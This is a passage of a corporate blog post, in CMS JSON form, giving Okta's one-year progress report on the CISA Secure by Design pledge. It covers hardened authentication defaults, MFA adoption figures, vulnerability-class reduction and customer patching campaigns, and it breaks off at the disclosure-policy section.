Officer","id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"<p>David Bradbury is Chief Security Officer at Okta. 
As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies. </p>\n\n<p>Prior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs. </p>\n\n<p>Bradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.</p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=15&h=23&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=29&h=44&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=58&h=87&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=116&h=174&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 
100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=58&h=87&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=15&h=23&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=29&h=44&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=58&h=87&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=116&h=174&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#e8e8d8","width":58,"height":87}}}],"title":"Okta’s Secure by Design Pledge - One Year On","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"A one-year progress update on Okta's commitment to the CISA Secure by Design Pledge."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Foreword  \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nA year ago, Okta was among the first technology providers to pledge our commitment to the US Cybersecurity and Infrastructure Security Agency (CISA)'s seven Secure by Design principles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To CISA’s great credit, the Secure by Design voluntary pledge program has 
created strong momentum across the cybersecurity industry. Nearly 300 technology companies have since signed the pledge, with most having made significant strides in documenting their progress toward these goals.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One year on, we’re taking a moment to reflect and share an update on Okta’s progress.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of Okta’s commitment to Secure by Design, the default configuration for all new Okta tenants has been hardened as follows:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"New Default\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Details\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Context\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Date of change\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Creation of API 
Tokens\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators are prompted for step-up authentication and prompted to assign an IP allowlist for all new SSWS API tokens.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"May 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing Resistance\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All new authentication and account management policies in Okta Workforce Identity will enforce phishing resistance by default if users are enrolled in phishing-resistant authenticators.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"April 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Step-Up 
Authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions are enabled by default, ensuring step-up authentication is applied for policy modifications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"April 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Maximum Global Session Lifetime\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default maximum Okta global session lifetime is now set to 24 hours.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reauthentication 
Frequency\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default reauthentication frequency in authentication policies was changed to one hour. \\n\\nThe option to force re-authentication “every time a user signs in to resource” is also labelled as the most secure option available in Okta Identity Engine.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025 in Okta Identity Engine\\n\\nMay 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA Requirement\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default selection presented to administrators creating a new authentication policy in Okta Identity Engine is now “Any 2 factor types”.\\n\\nIn the Okta Classic Engine, MFA is now enabled by default in new app sign-on rules when MFA factors are available to users.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 
2025\\n\\nMay 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session Risk Evaluation\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User and entity session risk evaluations are now available in System Log for all accounts directly assigned with Super Administrator permissions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrative Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Directory Agent Hardening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta directory agents now support end-to-end encryption and sender-constrained tokens using DPoP by default.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"July-\\nNovember 2024 in Okta Identity 
Engine\\n\\nJanuary 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA Enforcement\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All new authentication policies for the Okta Admin Console require multi-factor authentication.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine, Okta Classic Engine and Auth0 Management Console\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP Session Binding\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By default, all API and web requests made to the Okta service by users with administrative permissions are bound to the device IP address recorded at the time of sign-in.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic 
Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 2024\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Under the Secure by Design pledge, Okta committed to measurable improvements in seven key areas identified by CISA. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s full-year update for each of those initiatives is provided below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Driving Adoption of Multi-Factor Authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken to measurably increase the use of multi-factor authentication across the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has built on its best-in-class record for customer adoption of multi-factor authentication (MFA) among both users and administrators of Okta Workforce Identity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the course of the one-year pledge, Okta had three primary goals:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce MFA for all administrative access to management 
consoles,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Drive rapid adoption of high assurance, phishing-resistant authenticators such as Okta FastPass and FIDO2 passkeys,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reduce customer exposure to weaker authentication methods.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to the Okta Admin Console or the Auth0 Management console now requires multi-factor authentication (MFA). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reaching this milestone required an exhaustive program that restricted the ability for administrators to create a single factor authentication policy for the Okta Admin console, and worked closely with a large number of customers to ensure that their existing policies could meet this requirement prior to enforcement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We identified early in the process that some customers needed more time to meet this requirement - especially customers that allowed inline MFA enrolment, used inbound federation or relied on certain configurations of third-party Privileged Access Management solutions to access the Okta Admin Console. 
Okta released several innovations, such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.asqula.com/docs/guides/configure-claims-sharing/oktaoidc/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"authenticator claims sharing\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", to ensure MFA would always be applied, while maintaining a great experience for administrators. We thank these customers for taking this journey with us for the sake of our mutual security!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’re also very pleased to see rapid growth in high assurance, phishing-resistant authentication factors during the course of the pledge. According to Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/au/blog/2025/03/businesses-at-work-2025/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Businesses at Work 2025\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report, the volume of Okta FastPass authentications increased by 377% over 12 months. The total number of FastPass authentications backed by biometrics such as fingerprints or facial recognition increased by 288%. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By contrast, the use of lower assurance authentication methods has reduced: security questions by 12% and SMS/Voice Call by 14%.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. 
Reducing the use of default passwords\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate measurable progress towards reducing default passwords across the manufacturers’ products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As noted at the halfway point of the pledge term, Okta did not feel it necessary to pursue any further changes regarding default passwords. Where on-premise appliances, clients or agents require default credentials at installation, Okta enforces the required rotation of these credentials at first sign-in.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Reduce common classes of vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At the start of the pledge term, Okta committed to initiating a company-wide campaign to drive down exposure to a particular class of vulnerability.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our first task was to classify vulnerabilities using a consistent methodology across the multiple products and services developed by Okta. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Product Security aggregated vulnerability data from all Auth0 and Okta products to create a single source of truth where vulnerability data could be normalized, analyzed, and classified.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This analysis painted a clear picture of what required more focus: a subset of vulnerabilities classed as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Server Security Misconfigurations\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://bugcrowd.com/vulnerability-rating-taxonomy\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bugcrowd VRT\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For each shortlisted vulnerability, Product Security conducted “deep reviews” - technical investigations focused on specific vulnerability types, scoped for the entire codebase of Okta products, per their robust \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/resources/whitepaper-secure-development-lifecycle/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"secure development practices\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". The reviews identified several issues that have since been remediated.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of this work, we developed and shared our methodology for reducing vulnerability classes. 
The methodology consists of distinct phases:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Data Analysis - the aggregation, classification and trend analysis of vulnerability information.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scope Definition and Plan Execution - prioritizing results from data analysis based on frequency and risk, creating action plans, and executing and tracking remediation.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Program improvements - creating standard trending metrics, vulnerability classification standardization, and shorter feedback loops.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This methodology was shared with the CISA Secure by Design working group. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Drive improved customer patching hygiene\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken to measurably increase the installation of security patches by customers.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Under the shared responsibility model for security, customers are accountable for maintaining up-to-date versions of client software. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The CISA Secure by Design pledge promotes adoption of a “shared fate” approach to customer patching, where service providers play a more active role in steering customers toward better security outcomes. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has made measurable progress in our commitment to making it easy for customers to maintain up-to-date versions of client software.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the course of the pledge, we embarked on a campaign to convince customers to upgrade their AD (Active Directory) or LDAP agents to versions that include additional security controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As background; some Okta Workforce Identity customers choose to delegate primary authentication to on-premise directories such as Active Directory (AD) or LDAP. In these hybrid identity flows, users signing in to access cloud resources provide credentials that are forwarded to an agent running on a host on the customer’s network to check their validity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In these configurations, the integrity of the customer’s Okta implementation relies, to some degree, on the customer’s Active Directory hygiene. 
A disproportionate share of incidents reported by customers to Okta Identity Defence  arise from an existing compromise of the customer’s Active Directory network.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In July 2024, Okta released a redesigned AD agent that adopted the “Demonstrating Proof of Possession” (DPoP) extension to OIDC, and added the same protection to the Okta LDAP agent from November 2024. While DPoP does not directly prevent a compromise of a Windows host, it can significantly reduce the blast radius for any compromise of the on-prem server(s) a customer uses to host these agents. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within 90 days of the release of the AD Agent, 44% of customers updated their agents to a version that included DPoP. A follow-up communications campaign, in which Okta mooted the possibility of removing support for versions that did not include these protections, drove adoption to 83%. The following version introduced support for end-to-end encryption.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also observed that one of the primary instruments to achieving stronger customer patching hygiene is the availability and uptake of “automatic update” features in any given product. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have observed that while customers are very comfortable with automatic update mechanisms in software deployed to end-user clients, we face more resistance when customers are asked to enable automatic updates in client-side software deployed to servers. 
There is legitimate concern among CISOs - largely based on adverse events at other vendors - as to whether suppliers adequately test updates for every possible customer configuration prior to their release. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta ran direct-to-customer communications campaigns to assure customers of Okta’s strong record for stable updates. This drove a 6% increase in adoption. We continue to assess new ways of driving confidence in these controls. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Publish a Vulnerability Disclosure Policy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP) that authorizes testing by members of the public on products offered by the manufacturer, commits to not recommending or pursuing legal action against anyone engaging in good faith efforts to follow the VDP, provides a clear channel to report 